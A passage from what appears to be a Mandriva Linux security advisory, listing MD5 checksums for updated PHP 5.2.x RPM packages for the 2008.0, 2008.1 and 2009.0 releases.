2008.0/x86_64/php-iconv-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 609377659611b09a912c3f4e4c83be76 2008.0/x86_64/php-imap-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 6d3660ffea2d24be4c68d793134c0c34 2008.0/x86_64/php-json-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 675c9aa058452560f0a9abdf5fd2ba82 2008.0/x86_64/php-ldap-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n dc5b6c53e1e758d6b74c1fe10825dd72 2008.0/x86_64/php-mbstring-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n ff64296fcbda0f7569682bd59673450f 2008.0/x86_64/php-mcrypt-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 99104282fed99bc02a25409fc7d7029b 2008.0/x86_64/php-mhash-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 2df02e622e28c550232af3c6e06e0166 2008.0/x86_64/php-mime_magic-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n e9e866f96e0443fc64dd2ae57c0472ef 2008.0/x86_64/php-ming-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n f597684da35da805d0a220b025a3ae7c 2008.0/x86_64/php-mssql-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 064d13eb46925a16963ba775a226ef12 2008.0/x86_64/php-mysql-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 2493c54d72dc450f91d93c0dbc0a01b3 2008.0/x86_64/php-mysqli-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 20a3a90aa00f1b22869f1fc7d4494389 2008.0/x86_64/php-ncurses-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 8fdaffa64e39a508970fb415f6351f01 2008.0/x86_64/php-odbc-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n faf9ad17354a15f824ffecd5bb2a75b7 2008.0/x86_64/php-openssl-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 26f0c38401eed5590503d8a508035b95 2008.0/x86_64/php-pcntl-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 14678e0afc46cbf3f4023e0f867b6627 2008.0/x86_64/php-pdo-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 1370da5235cfdee0b87c9c9d1c7fb87d 2008.0/x86_64/php-pdo_dblib-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 54b56629d70affc6571710d259adbc87 2008.0/x86_64/php-pdo_mysql-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n d02fb5a48a3223ff24ffd73ebf7f950b 2008.0/x86_64/php-pdo_odbc-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n eb8602cd46cedc5ddc85ad9d1d841139 2008.0/x86_64/php-pdo_pgsql-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 2185bcf9b149d2f52ac9f0d103e64aec 2008.0/x86_64/php-pdo_sqlite-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 6ce02c1ad887d742a875c3d01044dddd 2008.0/x86_64/php-pgsql-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n b2b60dfa46b225b916cdb7b9404c4df6 2008.0/x86_64/php-posix-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 7ad5cbb447442b4153ed448d576318a4 2008.0/x86_64/php-pspell-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 43f1710129923b2ef65fd5cbe4b9da4e 2008.0/x86_64/php-readline-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n ae13ce727c71a8c177038e8619d7bc43 2008.0/x86_64/php-recode-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n e71ff58f0f7d63898d8bb7c1e82221a7 2008.0/x86_64/php-session-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n be073bccced4fff6145b7d605ebe10a4 2008.0/x86_64/php-shmop-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n d2aebb985287f8532927b82afe8b34fc 2008.0/x86_64/php-simplexml-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 1621c40c1ce5d44c4c268fe8611554f3 2008.0/x86_64/php-snmp-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 284a2ca48992069c3d4f94b9af36adf4 2008.0/x86_64/php-soap-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n b15bfb57514e457907132864d1e42207 2008.0/x86_64/php-sockets-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n cc13532ecd7a1945e09402d002a3b026 2008.0/x86_64/php-sqlite-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 3969fc11de6e1ef81d2609aaeeec397d 2008.0/x86_64/php-sysvmsg-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 04ec75ae57fef315eb9263da9e07610a 2008.0/x86_64/php-sysvsem-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n b51fc6f6b20232c427083d8699b308ca 2008.0/x86_64/php-sysvshm-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 53a1677552314b4ae1d6eadeebb9685f 2008.0/x86_64/php-tidy-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 72458375e9f70bc34a8133e92dcfd720 2008.0/x86_64/php-tokenizer-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 19ea2a5d529f4dac7b12e4f37b748c98 2008.0/x86_64/php-wddx-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 8541c5727a7d9133a6d7feb34f36ab43 2008.0/x86_64/php-xml-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n e42639d37bfa2d343403d8bc41313dfa 2008.0/x86_64/php-xmlreader-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 1baf9130053d83acdf533e1482a62518 2008.0/x86_64/php-xmlrpc-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 6cd04d07a856fea874d7507d5169688c 2008.0/x86_64/php-xmlwriter-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 5ba83b408e1196608ce18a00c91d98d5 2008.0/x86_64/php-xsl-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 80f1966de2b65538bdd7eb714ec0473a 2008.0/x86_64/php-zlib-5.2.4-3.5mdv2008.0.x86_64.rpm \r\n 9e31bb51fea2c19142048d60ed29d5ac 2008.0/SRPMS/php-5.2.4-3.5mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2008.1:\r\n 2699bedf3669cddf596019923c01988b 2008.1/i586/libphp5_common5-5.2.5-14.4mdv2008.1.i586.rpm\r\n 5e9fff154cbd7340effcdd4272cc1036 2008.1/i586/php-bcmath-5.2.5-14.4mdv2008.1.i586.rpm\r\n 433fedbea61d093164e2fc9a0861b04a 2008.1/i586/php-bz2-5.2.5-14.4mdv2008.1.i586.rpm\r\n ca22e5f80da1aa662d50d52ecccfc7bd 2008.1/i586/php-calendar-5.2.5-14.4mdv2008.1.i586.rpm\r\n 11d2bc1eef435ff465e929f70b7881b8 2008.1/i586/php-cgi-5.2.5-14.4mdv2008.1.i586.rpm\r\n a971a160099aed54bc5efd863c7ec726 2008.1/i586/php-cli-5.2.5-14.4mdv2008.1.i586.rpm\r\n 4c2943b731b79c7e1e83751d2cddbc02 2008.1/i586/php-ctype-5.2.5-14.4mdv2008.1.i586.rpm\r\n 9151d363427449be03f8ef369559a319 2008.1/i586/php-curl-5.2.5-14.4mdv2008.1.i586.rpm\r\n fd2e195a1627760e3fd1365a04e52546 2008.1/i586/php-dba-5.2.5-14.4mdv2008.1.i586.rpm\r\n 64be53b60563920c6df5a23a7a0c6285 2008.1/i586/php-dbase-5.2.5-14.4mdv2008.1.i586.rpm\r\n 5cabc96de40a9d96d8149e901a16cc98 2008.1/i586/php-devel-5.2.5-14.4mdv2008.1.i586.rpm\r\n d10c3b4c8f10a61ee25d1f6037e51e62 2008.1/i586/php-dom-5.2.5-14.4mdv2008.1.i586.rpm\r\n 720b79d68eb3e4a79955119737191847 2008.1/i586/php-exif-5.2.5-14.4mdv2008.1.i586.rpm\r\n fea8f8ed02a5f30f37e973f94be6a994 2008.1/i586/php-fcgi-5.2.5-14.4mdv2008.1.i586.rpm\r\n 647c4c99aae392c51f09229d1579c4ea 2008.1/i586/php-filter-5.2.5-14.4mdv2008.1.i586.rpm\r\n b35c322379ea0dedec553e47903caa72 2008.1/i586/php-ftp-5.2.5-14.4mdv2008.1.i586.rpm\r\n e3f8416f8a9dec5d25dab3aa2b104b69 2008.1/i586/php-gd-5.2.5-14.4mdv2008.1.i586.rpm\r\n 5b92d876b74168c820a2a3981a3fc05a 2008.1/i586/php-gettext-5.2.5-14.4mdv2008.1.i586.rpm\r\n 8a02b921e2cb3cf77b89a442813f6d25 2008.1/i586/php-gmp-5.2.5-14.4mdv2008.1.i586.rpm\r\n 450d67797c65124c468e65f832160db4 2008.1/i586/php-hash-5.2.5-14.4mdv2008.1.i586.rpm\r\n 8dfaf66e72cfc48e0b7bb2d34e4a682c 2008.1/i586/php-iconv-5.2.5-14.4mdv2008.1.i586.rpm\r\n da4f66f1ae42e3f654cfd11dfe77632f 2008.1/i586/php-imap-5.2.5-14.4mdv2008.1.i586.rpm\r\n 05f021edcd98562b9322b41ba4581e45 2008.1/i586/php-json-5.2.5-14.4mdv2008.1.i586.rpm\r\n afa1628ecfa6fa946c464acfa29e0144 2008.1/i586/php-ldap-5.2.5-14.4mdv2008.1.i586.rpm\r\n 9c1e6614cf68b3f313f62d6b66089121 2008.1/i586/php-mbstring-5.2.5-14.4mdv2008.1.i586.rpm\r\n 4efd9f36dd4e341911163dc445d2c01c 2008.1/i586/php-mcrypt-5.2.5-14.4mdv2008.1.i586.rpm\r\n d7b8fb005b206eda3f4c7790cfb17ce9 2008.1/i586/php-mhash-5.2.5-14.4mdv2008.1.i586.rpm\r\n c96ea0a20a26455c4a6bd33d39226ed4 2008.1/i586/php-mime_magic-5.2.5-14.4mdv2008.1.i586.rpm\r\n abbd2caf78f7d477ff584112bb73b989 2008.1/i586/php-ming-5.2.5-14.4mdv2008.1.i586.rpm\r\n 0d4809d6156e7738953c53db8a0c3871 2008.1/i586/php-mssql-5.2.5-14.4mdv2008.1.i586.rpm\r\n 4f3c37049e3c86995929044678a17c86 2008.1/i586/php-mysql-5.2.5-14.4mdv2008.1.i586.rpm\r\n 2679275da2c84506a8938b2f08a24bfe 2008.1/i586/php-mysqli-5.2.5-14.4mdv2008.1.i586.rpm\r\n af23c5e284122c9a3e0c55f578919efd 2008.1/i586/php-ncurses-5.2.5-14.4mdv2008.1.i586.rpm\r\n da89454a8b64fbb51aaf6d7ca07f776d 2008.1/i586/php-odbc-5.2.5-14.4mdv2008.1.i586.rpm\r\n c023134ba6200923f64ce4ea6d6c6422 2008.1/i586/php-openssl-5.2.5-14.4mdv2008.1.i586.rpm\r\n f80a84ca4c48d7e935b2cb7d781674af 2008.1/i586/php-pcntl-5.2.5-14.4mdv2008.1.i586.rpm\r\n b0c5ee1b78931f848942783f47636484 2008.1/i586/php-pdo-5.2.5-14.4mdv2008.1.i586.rpm\r\n 7a08c05cae436660b750ca132e17262a 2008.1/i586/php-pdo_dblib-5.2.5-14.4mdv2008.1.i586.rpm\r\n 000c3039a02e9487faa5271d6821115d 2008.1/i586/php-pdo_mysql-5.2.5-14.4mdv2008.1.i586.rpm\r\n 03817f8612e8ac494c788335bb4d532e 2008.1/i586/php-pdo_odbc-5.2.5-14.4mdv2008.1.i586.rpm\r\n 64f50e0da0fb7f3e1e9829e15e2f8946 2008.1/i586/php-pdo_pgsql-5.2.5-14.4mdv2008.1.i586.rpm\r\n 32c0351660f620e178b9bff9003bad5a 2008.1/i586/php-pdo_sqlite-5.2.5-14.4mdv2008.1.i586.rpm\r\n 1e77a34d5f01511063da2194ca36d098 2008.1/i586/php-pgsql-5.2.5-14.4mdv2008.1.i586.rpm\r\n 6650386e8d87d3893564e7363430c22d 2008.1/i586/php-posix-5.2.5-14.4mdv2008.1.i586.rpm\r\n f13b6ab00bb56e19d55f387e3412f362 2008.1/i586/php-pspell-5.2.5-14.4mdv2008.1.i586.rpm\r\n ccb9e27af730b9de9d4d0e9e8d7b3beb 2008.1/i586/php-readline-5.2.5-14.4mdv2008.1.i586.rpm\r\n 798712a3c0a41578d7133cee15abb15b 2008.1/i586/php-recode-5.2.5-14.4mdv2008.1.i586.rpm\r\n 592bf07186391fc0ddfe20ff32116e71 2008.1/i586/php-session-5.2.5-14.4mdv2008.1.i586.rpm\r\n a8127e519df4dcc7ebe7b8848c47409a 2008.1/i586/php-shmop-5.2.5-14.4mdv2008.1.i586.rpm\r\n 3f6be3ee7ce37b16022bd43d7bde2138 2008.1/i586/php-snmp-5.2.5-14.4mdv2008.1.i586.rpm\r\n e80ef54ce720993ede94f9ec1273712c 2008.1/i586/php-soap-5.2.5-14.4mdv2008.1.i586.rpm\r\n db13be028286f5c5176beffece796137 2008.1/i586/php-sockets-5.2.5-14.4mdv2008.1.i586.rpm\r\n 799b8a2dc390950bc45926fddb5c381f 2008.1/i586/php-sqlite-5.2.5-14.4mdv2008.1.i586.rpm\r\n 7ea3bc3a05b2652a25bd3c56d2d48845 2008.1/i586/php-sysvmsg-5.2.5-14.4mdv2008.1.i586.rpm\r\n 06b45292a870fc1d27e746bcbb5ebcef 2008.1/i586/php-sysvsem-5.2.5-14.4mdv2008.1.i586.rpm\r\n 921e0e7d5d22fbcf06989171eda9db5b 2008.1/i586/php-sysvshm-5.2.5-14.4mdv2008.1.i586.rpm\r\n f302373d8e3cc6efbeb5f7345ca4901b 2008.1/i586/php-tidy-5.2.5-14.4mdv2008.1.i586.rpm\r\n 3df0e99f9cca7e700374261a0058b868 2008.1/i586/php-tokenizer-5.2.5-14.4mdv2008.1.i586.rpm\r\n d6c41de2069f7ea20f21dcad7a55db7b 2008.1/i586/php-wddx-5.2.5-14.4mdv2008.1.i586.rpm\r\n d44fa2efdb18bf9f4448744a9c643d5c 2008.1/i586/php-xml-5.2.5-14.4mdv2008.1.i586.rpm\r\n c58ab80fd28701ebeb35f504a40452f3 2008.1/i586/php-xmlreader-5.2.5-14.4mdv2008.1.i586.rpm\r\n 7773725131323cd798c4913b08f6c93c 2008.1/i586/php-xmlrpc-5.2.5-14.4mdv2008.1.i586.rpm\r\n 55d2c3fc71c7ce0617b714909ea3b330 2008.1/i586/php-xmlwriter-5.2.5-14.4mdv2008.1.i586.rpm\r\n 8fd2ce7477c382ae828c774f1ea774b6 2008.1/i586/php-xsl-5.2.5-14.4mdv2008.1.i586.rpm\r\n 761b58a4e7fe100a9b56aa4d6d1be31b 2008.1/i586/php-zlib-5.2.5-14.4mdv2008.1.i586.rpm \r\n c5bb17d306abc830af1e3289d0feb87e 2008.1/SRPMS/php-5.2.5-14.4mdv2008.1.src.rpm\r\n\r\n Mandriva Linux 2008.1/X86_64:\r\n 491820e062701dd823cf171153094b54 2008.1/x86_64/lib64php5_common5-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 35b97f20d78e9e49557f765e3db9ce92 2008.1/x86_64/php-bcmath-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 2e79e6acff96bdf8b73ec954f43ba556 2008.1/x86_64/php-bz2-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 03b58fd4dc9965881831e4391473aae9 2008.1/x86_64/php-calendar-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 77f03d3261c625c3f5cadb6bd4739feb 2008.1/x86_64/php-cgi-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 43bfa30615bbc6153e6f42a5fd0e183c 2008.1/x86_64/php-cli-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 8cf5edbb591de82488fa9a07d7f6e9c7 2008.1/x86_64/php-ctype-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n f63a3ba96fafcc559204ee4c7a52fb2f 2008.1/x86_64/php-curl-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 434ee9781e0903accff13ed076f21934 2008.1/x86_64/php-dba-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 964b9af15e42a53a0f95b08da4aedc0d 2008.1/x86_64/php-dbase-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 04dbfc264c32c6bda62077a764a29edf 2008.1/x86_64/php-devel-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n fd50ecbb4c6a2a4365f3eb1e86eaafca 2008.1/x86_64/php-dom-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n f5f71a2eb1a3e92a2375a1a9ead9f757 2008.1/x86_64/php-exif-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 71a3b2911847c7e1bd11e37e09366690 2008.1/x86_64/php-fcgi-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n ebc91459bea6d287b777d64fbe8087c7 2008.1/x86_64/php-filter-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 092a957f088d21a58c7a1d0d62c47d9a 2008.1/x86_64/php-ftp-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n b3f06fa36ba1f75f282b09986c26c518 2008.1/x86_64/php-gd-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n b6783bf4007f5b8d2d55185aec0804da 2008.1/x86_64/php-gettext-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 4ba37091ca19fc2f3ce528318552d8e7 2008.1/x86_64/php-gmp-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 8c849776c26d3af72175ca740f75c8d0 2008.1/x86_64/php-hash-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 2b81f83d3c9abb155e8fea670be5dde5 2008.1/x86_64/php-iconv-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n f9e2405074eda8979df292baabf33c9d 2008.1/x86_64/php-imap-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 52589a8cb582f147ea84c0a30ed62e9a 2008.1/x86_64/php-json-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n e73f78480c53f4606ce7e71b4ba0ee08 2008.1/x86_64/php-ldap-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 32bee617bd97a0c8bc46bef066698228 2008.1/x86_64/php-mbstring-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n f82ee9e0bd90b6996211b49b0c24dae9 2008.1/x86_64/php-mcrypt-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n a908ff19444d0ebef0118cc004a1ae12 2008.1/x86_64/php-mhash-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n c884d06cffc3b87ce307cfb3ec9f25de 2008.1/x86_64/php-mime_magic-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n ac81fb9db82e8df732920de0acb8a54a 2008.1/x86_64/php-ming-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 674155d47bdc17f7fefe4c6cd536ac88 2008.1/x86_64/php-mssql-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n a9f6d8fb665a426b51cfb0648a59fc99 2008.1/x86_64/php-mysql-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n e79dbc75577e346fb6a9d15126e7d1c8 2008.1/x86_64/php-mysqli-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 64fb3e36e335c0ad81f55996ad2c059a 2008.1/x86_64/php-ncurses-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 43df90bdffabf8d81874337a5227f70a 2008.1/x86_64/php-odbc-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 7f1fd373649c8af3936c3a2c80d2d03e 2008.1/x86_64/php-openssl-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n ed5c02a83a387666a2ac96b8b56c03d3 2008.1/x86_64/php-pcntl-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n eba67947e0ed0eeda43a8872af9b75b3 2008.1/x86_64/php-pdo-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 70e4469edcd51c6bf2628065017ffed7 2008.1/x86_64/php-pdo_dblib-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 1d2da700fe9b49dfc645dc96533de2d3 2008.1/x86_64/php-pdo_mysql-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 2e698a1721ee05ba8018aa394351f622 2008.1/x86_64/php-pdo_odbc-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 4e34a31560a44e21a92075276ae6fb69 2008.1/x86_64/php-pdo_pgsql-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 0785495ba82441704c4c41c1844d6149 2008.1/x86_64/php-pdo_sqlite-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n aa2b9a5d2271fa40bc7074c2ee16b2f9 2008.1/x86_64/php-pgsql-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 56832ddbeb8e20f94fe7332891e203ff 2008.1/x86_64/php-posix-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 15acc7fe100acc365d35d0d5826f883b 2008.1/x86_64/php-pspell-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n f238474dcb6ffcab2f2f3500d39a1c65 2008.1/x86_64/php-readline-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 809d3792ccdab501e0137600b4453314 2008.1/x86_64/php-recode-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 45a0d7ad5e2dbee271c3fe08594f0e51 2008.1/x86_64/php-session-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n a2cdaec928ee3e747009e9a5002e5e23 2008.1/x86_64/php-shmop-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n b93cd9fbd226f65db3b7641258dd1ce2 2008.1/x86_64/php-snmp-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n d9545793c3efdacbc1dfc5bb4890acb3 2008.1/x86_64/php-soap-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 0cbf907e1b6a484e558276d927c87a89 2008.1/x86_64/php-sockets-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n eae5af025e4fd0c5075f1c26c36022cb 2008.1/x86_64/php-sqlite-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 37e4d43c03f74a529aed0baa68835fc6 2008.1/x86_64/php-sysvmsg-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n c78265474f375646e3f749c97359718d 2008.1/x86_64/php-sysvsem-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 8c7de8e3c20e1c97ff3c2e89015d6c25 2008.1/x86_64/php-sysvshm-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 3abe61ac7b93363078ddd705178a13c6 2008.1/x86_64/php-tidy-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 120fd0678453a1ce19499daeecb5c48d 2008.1/x86_64/php-tokenizer-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 3343908cfcb8637f1c51834a9b07c1a3 2008.1/x86_64/php-wddx-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n c8288f3c966582139ad17f7861bbe9ae 2008.1/x86_64/php-xml-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 4469c36e90e4bc1bc33e475db3916b26 2008.1/x86_64/php-xmlreader-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 315a5f4078528a5e941e69b50dfab119 2008.1/x86_64/php-xmlrpc-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 1581ce3d86e8c7c4b0a4fe053fa5943a 2008.1/x86_64/php-xmlwriter-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 6a9b22fdc3704ce032b8ff69a835085d 2008.1/x86_64/php-xsl-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n ae4d0e61d1aba23b9baa304d4a662316 2008.1/x86_64/php-zlib-5.2.5-14.4mdv2008.1.x86_64.rpm \r\n c5bb17d306abc830af1e3289d0feb87e 2008.1/SRPMS/php-5.2.5-14.4mdv2008.1.src.rpm\r\n\r\n Mandriva Linux 2009.0:\r\n f72d3b1d596b4f3e6d3e5734017ae1d2 2009.0/i586/libphp5_common5-5.2.6-18.3mdv2009.0.i586.rpm\r\n b70b5a44a084ab088cd7a1e2c96d75be 2009.0/i586/php-bcmath-5.2.6-18.3mdv2009.0.i586.rpm\r\n db8eda5e9355a4abac1c2fa056c8bdaf 2009.0/i586/php-bz2-5.2.6-18.3mdv2009.0.i586.rpm\r\n 31291a92a5d92afffa45f80fbd66a193 2009.0/i586/php-calendar-5.2.6-18.3mdv2009.0.i586.rpm\r\n f031463a25e0eafd33ca6f9671986380 2009.0/i586/php-cgi-5.2.6-18.3mdv2009.0.i586.rpm\r\n edb7d50dcb61c5b28714e27e9632fef4 2009.0/i586/php-cli-5.2.6-18.3mdv2009.0.i586.rpm\r\n ce6bd87c1424004bdbf80a59d8edcbdd 2009.0/i586/php-ctype-5.2.6-18.3mdv2009.0.i586.rpm\r\n ed2c69240fb11fa5e24ae283fd3f0576 2009.0/i586/php-curl-5.2.6-18.3mdv2009.0.i586.rpm\r\n e9bbbc7cb51f33526ac9a3c353e1dcef 2009.0/i586/php-dba-5.2.6-18.3mdv2009.0.i586.rpm\r\n 07d9fb7ece146328895ae2a7133ec454 2009.0/i586/php-dbase-5.2.6-18.3mdv2009.0.i586.rpm\r\n 84fbf3636d32d58d372d80790ace3505 2009.0/i586/php-devel-5.2.6-18.3mdv2009.0.i586.rpm\r\n 146ab157a25ada5dc9b3607cf7e458dd 2009.0/i586/php-dom-5.2.6-18.3mdv2009.0.i586.rpm\r\n 6ac54813f1322b20ab2fca52af6f9b59 2009.0/i586/php-exif-5.2.6-18.3mdv2009.0.i586.rpm\r\n 7436417fa8e2325c8cff794f8696304b 2009.0/i586/php-fcgi-5.2.6-18.3mdv2009.0.i586.rpm\r\n ecbe0d0c774edd2e359528fde4cee6c5 2009.0/i586/php-filter-5.2.6-18.3mdv2009.0.i586.rpm\r\n 4de456ace608699dcfc4f28679d3ed7b 2009.0/i586/php-ftp-5.2.6-18.3mdv2009.0.i586.rpm\r\n 359220d70d4be36d059b652edf00fff5 2009.0/i586/php-gd-5.2.6-18.3mdv2009.0.i586.rpm\r\n 1f0ad71963146c84840780acbcb0ad55 2009.0/i586/php-gettext-5.2.6-18.3mdv2009.0.i586.rpm\r\n 4adc622e706cc10deaa885bc14fca519 2009.0/i586/php-gmp-5.2.6-18.3mdv2009.0.i586.rpm\r\n 5c75a244754b5c1084ee8e8d4fd4a2da 2009.0/i586/php-hash-5.2.6-18.3mdv2009.0.i586.rpm\r\n 36228f1479aa715385f18067ddb382bf 2009.0/i586/php-iconv-5.2.6-18.3mdv2009.0.i586.rpm\r\n b997947d6ab76681ac9dd6b0e69fc06c 2009.0/i586/php-imap-5.2.6-18.3mdv2009.0.i586.rpm\r\n 39d4a6fb1920101652d0a9f4f392e4fe 2009.0/i586/php-json-5.2.6-18.3mdv2009.0.i586.rpm\r\n 1da4900455c839ab9fb09bb486342b83 2009.0/i586/php-ldap-5.2.6-18.3mdv2009.0.i586.rpm\r\n 55deab4b204838cc040c7a7d5c92efc2 2009.0/i586/php-mbstring-5.2.6-18.3mdv2009.0.i586.rpm\r\n 0e57d6b6118a25eb157ec58d154fa5b1 2009.0/i586/php-mcrypt-5.2.6-18.3mdv2009.0.i586.rpm\r\n 31180aaae42bd0f32201ea28f0f86aad 2009.0/i586/php-mhash-5.2.6-18.3mdv2009.0.i586.rpm\r\n 913f7aefe94633147983070e8efd4afa 2009.0/i586/php-mime_magic-5.2.6-18.3mdv2009.0.i586.rpm\r\n 0ac4c1576514019f6f9e41cf0347e155 2009.0/i586/php-ming-5.2.6-18.3mdv2009.0.i586.rpm\r\n 622f174fac61ac88e14eeaddd0d39dd0 2009.0/i586/php-mssql-5.2.6-18.3mdv2009.0.i586.rpm\r\n 397666097b969ab25e006526ced22f04 2009.0/i586/php-mysql-5.2.6-18.3mdv2009.0.i586.rpm\r\n b1e565e8fa3c3eaf29fb1662de8e5307 2009.0/i586/php-mysqli-5.2.6-18.3mdv2009.0.i586.rpm\r\n 4d46a7baa48bfcc1fec55dd0548e23ee 2009.0/i586/php-ncurses-5.2.6-18.3mdv2009.0.i586.rpm\r\n 9c7706e4433b263cd9e3582e5918893e 2009.0/i586/php-odbc-5.2.6-18.3mdv2009.0.i586.rpm\r\n 5bd5bd2e82481713df12f910b356a464 2009.0/i586/php-openssl-5.2.6-18.3mdv2009.0.i586.rpm\r\n 06b3d734e8efb7ead5db0d66372a8eba 2009.0/i586/php-pcntl-5.2.6-18.3mdv2009.0.i586.rpm\r\n f685c56f503fa7ee55c072f706c5f12d 2009.0/i586/php-pdo-5.2.6-18.3mdv2009.0.i586.rpm\r\n 494913c1dbd24d13a3e53f0f94976e7c 2009.0/i586/php-pdo_dblib-5.2.6-18.3mdv2009.0.i586.rpm\r\n ff86b7a00fbbfa5d1cd8e9e62e00e58c 2009.0/i586/php-pdo_mysql-5.2.6-18.3mdv2009.0.i586.rpm\r\n 8152ef86fbefdb271a0a8bed4612dfb8 2009.0/i586/php-pdo_odbc-5.2.6-18.3mdv2009.0.i586.rpm\r\n 54836ddbb393bb84f14864e2926e5c56 2009.0/i586/php-pdo_pgsql-5.2.6-18.3mdv2009.0.i586.rpm\r\n 323e193a27a4141e3f63357315973110 2009.0/i586/php-pdo_sqlite-5.2.6-18.3mdv2009.0.i586.rpm\r\n 8663e75f8ff00082cc88e3470fc3fe14 2009.0/i586/php-pgsql-5.2.6-18.3mdv2009.0.i586.rpm\r\n fccc09bf3215b3bc76647f046743602d 2009.0/i586/php-posix-5.2.6-18.3mdv2009.0.i586.rpm\r\n 280b2c80ba27512803aed11fea0751a5 2009.0/i586/php-pspell-5.2.6-18.3mdv2009.0.i586.rpm\r\n af53cd4fac7df275ecbc18f693d309d1 2009.0/i586/php-readline-5.2.6-18.3mdv2009.0.i586.rpm\r\n 28e3b4fcac9beed4f2efe590a5d09ef1 